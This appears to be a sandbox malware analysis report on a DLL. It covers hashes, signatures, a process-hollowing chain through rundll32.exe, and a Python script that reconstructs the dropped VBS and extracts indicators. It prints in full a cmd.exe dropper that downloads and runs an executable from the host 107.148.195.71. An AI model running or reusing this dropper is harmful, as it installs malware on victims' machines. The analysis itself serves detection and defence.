Analysis
- max time kernel: 96s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 03-07-2022 08:40

Tasks
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
  - Resource: win7-20220414-en
- Behavioral task: behavioral2
  - Sample: 3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
  - Resource: win10v2004-20220414-en
General
- Target: 3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
- Size: 5KB
- MD5: 4b128c58a8afdc3a838018142fdb4bea
- SHA1: 73a1f572471d6cb23de20258d3db4860f82cac1c
- SHA256: 3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3
- SHA512: 3b1a1afa0729ed7d4d5f1c1fb8188e4ee007ad353a68255cb110a7940719d827ea9fc9cffd9074261c2d308f50c6ef5c324672188d33c5f8c56c3d83a6656ede
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  Process: cscript.exe, PID 1016, network flow 7
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely geofence.
  Key value queried by cscript.exe: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation
  Caveat: the dropped script (see Processes) contains no geolocation logic, so this registry read is most likely incidental to script-host startup rather than a deliberate geofence.
- Suspicious use of SetThreadContext (1 IoC)
  PID 2156 (rundll32.exe) set the thread context of PID 3884 (rundll32.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is the generic description attached to the signature; nothing else in this report points to ransomware, the observed payload is a download-and-execute VBS dropper.
- Suspicious use of WriteProcessMemory (13 IoCs)
  Source PID (process) -> target PID (process), number of writes:
  4476 (rundll32.exe) -> 2156 (rundll32.exe), 3
  2156 (rundll32.exe) -> 3884 (rundll32.exe), 4
  3884 (rundll32.exe) -> 4424 (cmd.exe), 3
  4424 (cmd.exe) -> 1016 (cscript.exe), 3
  Writes from a parent into a child it has just created (for example cmd.exe into cscript.exe) are produced by ordinary process creation; the 2156 -> 3884 writes, combined with the SetThreadContext call on the same target, are the ones that matter.
Processes
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#1
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c echo on error resume next >%TEMP%\Sz7Xk0.vbs && echo Set xPost = CreateObject("Msxml2.XMLHTTP") >>%TEMP%\Sz7Xk0.vbs && echo xPost.Open "GET","http://107.148.195.71/w_download.exe ",0 >>%TEMP%\Sz7Xk0.vbs && echo xPost.Send() >>%TEMP%\Sz7Xk0.vbs && echo Set aGet = CreateObject("ADODB.Stream") >>%TEMP%\Sz7Xk0.vbs && echo aGet.Mode = 3 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Type = 1 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Open() >>%TEMP%\Sz7Xk0.vbs && echo aGet.Write(xPost.responseBody) >>%TEMP%\Sz7Xk0.vbs && echo aGet.SaveToFile "%TEMP%\12345678.exe",2 >>%TEMP%\Sz7Xk0.vbs && echo wscript.sleep 1000 >>%TEMP%\Sz7Xk0.vbs && echo Set Shell = CreateObject("Wscript.Shell") >>%TEMP%\Sz7Xk0.vbs && echo Shell.Run ("%TEMP%\12345678.exe") >>%TEMP%\Sz7Xk0.vbs && echo CreateObject("Scripting.Filesystemobject").DeleteFile(WScript.ScriptFullName) >>%TEMP%\Sz7Xk0.vbs && cscript.exe //nologo %TEMP%\Sz7Xk0.vbs
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cscript.exe
          cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbs
          - Blocklisted process makes network request
          - Checks computer location settings

Reading the tree:
- The 64-bit system32\rundll32.exe hands off to SysWOW64\rundll32.exe with the same arguments (export ordinal #1), consistent with the DLL being 32-bit.
- The SysWOW64 rundll32.exe writes into a third rundll32.exe started with no arguments and then sets its thread context. A fresh, argument-less copy of the same host binary receiving WriteProcessMemory followed by SetThreadContext is the classic pattern of injecting an unpacked payload into a sacrificial process (process hollowing).
- The injected rundll32.exe spawns cmd.exe, which builds %TEMP%\Sz7Xk0.vbs one echo at a time and runs it with cscript.exe //nologo. The script fetches http://107.148.195.71/w_download.exe through Msxml2.XMLHTTP, writes the response body to %TEMP%\12345678.exe with ADODB.Stream, sleeps one second, runs it via WScript.Shell and then deletes itself (DeleteFile on WScript.ScriptFullName). The trailing space inside the quoted URL is present in the command line as recorded.
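The cmd.exe command line above is the entire dropper, so it is worth being able to turn it back into the file it writes without running anything. The following Python is an added example, not part of the sandbox report or of the sample: it replays the echo chain the way cmd.exe executes it (`>` truncates, `>>` appends, each echo argument is written verbatim including the space before the redirection, followed by CRLF), expands %TEMP% to the directory seen under Downloads (an assumption taken from the dropped-file path), and pulls the download URL, drop path, executed path and self-deletion out of the reconstructed script. The command line embedded as `CMDLINE` is copied from the process tree with the tree-depth marker removed.

```python
"""Reconstruct a VBS dropper written by a cmd.exe echo chain and extract its IOCs."""
import hashlib
import re
from dataclasses import dataclass, field

# Constructed input: the cmd.exe command line recorded in the process tree above,
# with the rendering's tree-depth marker removed and nothing else changed.
CMDLINE = (
    r'cmd.exe /c echo on error resume next >%TEMP%\Sz7Xk0.vbs'
    r' && echo Set xPost = CreateObject("Msxml2.XMLHTTP") >>%TEMP%\Sz7Xk0.vbs'
    r' && echo xPost.Open "GET","http://107.148.195.71/w_download.exe ",0 >>%TEMP%\Sz7Xk0.vbs'
    r' && echo xPost.Send() >>%TEMP%\Sz7Xk0.vbs'
    r' && echo Set aGet = CreateObject("ADODB.Stream") >>%TEMP%\Sz7Xk0.vbs'
    r' && echo aGet.Mode = 3 >>%TEMP%\Sz7Xk0.vbs'
    r' && echo aGet.Type = 1 >>%TEMP%\Sz7Xk0.vbs'
    r' && echo aGet.Open() >>%TEMP%\Sz7Xk0.vbs'
    r' && echo aGet.Write(xPost.responseBody) >>%TEMP%\Sz7Xk0.vbs'
    r' && echo aGet.SaveToFile "%TEMP%\12345678.exe",2 >>%TEMP%\Sz7Xk0.vbs'
    r' && echo wscript.sleep 1000 >>%TEMP%\Sz7Xk0.vbs'
    r' && echo Set Shell = CreateObject("Wscript.Shell") >>%TEMP%\Sz7Xk0.vbs'
    r' && echo Shell.Run ("%TEMP%\12345678.exe") >>%TEMP%\Sz7Xk0.vbs'
    r' && echo CreateObject("Scripting.Filesystemobject").DeleteFile(WScript.ScriptFullName) >>%TEMP%\Sz7Xk0.vbs'
    r' && cscript.exe //nologo %TEMP%\Sz7Xk0.vbs'
)

# Assumed value of %TEMP% in the sandbox, taken from the dropped-file path under Downloads.
TEMP_DIR = r'C:\Users\Admin\AppData\Local\Temp'

# "echo <payload><op><target>": payload keeps the space before the redirection, as cmd does.
ECHO_RE = re.compile(r'^echo (.*?)(>>|>)(\S+)$')
URL_RE = re.compile(r'https?://[^\s"]+')                # [^\s"] drops the stray space in the URL
SAVE_RE = re.compile(r'\.SaveToFile\s+"([^"]+)"', re.IGNORECASE)
RUN_RE = re.compile(r'\.Run\s*\(?\s*"([^"]+)"', re.IGNORECASE)
SELF_DELETE_RE = re.compile(r'DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)', re.IGNORECASE)


@dataclass
class DropperReport:
    files: dict = field(default_factory=dict)   # expanded path -> reconstructed bytes
    launch: str = ''                            # the non-echo command that runs the script
    urls: list = field(default_factory=list)
    saved_to: list = field(default_factory=list)
    executed: list = field(default_factory=list)
    self_deletes: bool = False

    def sha256(self, path):
        return hashlib.sha256(self.files[path]).hexdigest()


def expand(s, temp=TEMP_DIR):
    """Expand %TEMP% as cmd.exe does before echo ever sees its arguments."""
    return re.sub(r'%TEMP%', lambda _m: temp, s, flags=re.IGNORECASE)


def reconstruct(cmdline, temp=TEMP_DIR):
    """Replay the echo/redirect chain: '>' truncates, '>>' appends, each write is payload + CRLF."""
    body = re.sub(r'^cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.IGNORECASE)
    report = DropperReport()
    for seg in body.split(' && '):
        m = ECHO_RE.match(seg)
        if not m:
            report.launch = expand(seg, temp)    # e.g. cscript.exe //nologo <script>
            continue
        payload, op, target = m.groups()
        target = expand(target, temp)
        line = (expand(payload, temp) + '\r\n').encode('latin-1')
        report.files[target] = line if op == '>' else report.files.get(target, b'') + line
    return report


def extract_iocs(report):
    """Pull network and host IOCs out of every reconstructed file."""
    for content in report.files.values():
        text = content.decode('latin-1')
        report.urls += URL_RE.findall(text)
        report.saved_to += SAVE_RE.findall(text)
        report.executed += RUN_RE.findall(text)
        if SELF_DELETE_RE.search(text):
            report.self_deletes = True
    return report


def analyze(cmdline=CMDLINE, temp=TEMP_DIR):
    return extract_iocs(reconstruct(cmdline, temp))


if __name__ == '__main__':
    r = analyze()
    for path, data in r.files.items():
        print(f'== {path} ({len(data)} bytes, sha256 {r.sha256(path)})')
        print(data.decode('latin-1'), end='')
    print('launch   :', r.launch)
    print('urls     :', r.urls)
    print('saved_to :', r.saved_to)
    print('executed :', r.executed)
    print('self-del :', r.self_deletes)
```

The natural check is to compare the SHA256 of the reconstruction with the hash of Sz7Xk0.vbs listed under Downloads. Be aware that the HTML rendering of a report can collapse runs of whitespace inside the command line, in which case the reconstruction will differ from the 558 B dropped file by a few bytes and the hash will not match; the extracted URL, paths and self-deletion flag are unaffected by that.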
MITRE ATT&CK Matrix: ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbs
  - Filesize: 558B
  - MD5: 2f8fa35bb6829ce8ee55c2c69532c4a7
  - SHA1: f5a2a9f60c0ce0094d77a338ebe2574c8f4a58ed
  - SHA256: c43489b039542edcc3f573e258b6bd4f5fbe1ca646e3bd3c91cef3f2aea8dad6
  - SHA512: 436cca14f204dd28b1e39821f720757ee03641ef084cfc99e89d61e3f36b3b047a1a9ccdd978db8a5460c3e09ad9b734aa2b47db9fb3ea784ef249b935e44f19
- Memory dumps (PID-sequence-address):
  - memory/1016-133-0x0000000000000000-mapping.dmp
  - memory/2156-130-0x0000000000000000-mapping.dmp
  - memory/3884-131-0x0000000000000000-mapping.dmp
  - memory/4424-132-0x0000000000000000-mapping.dmp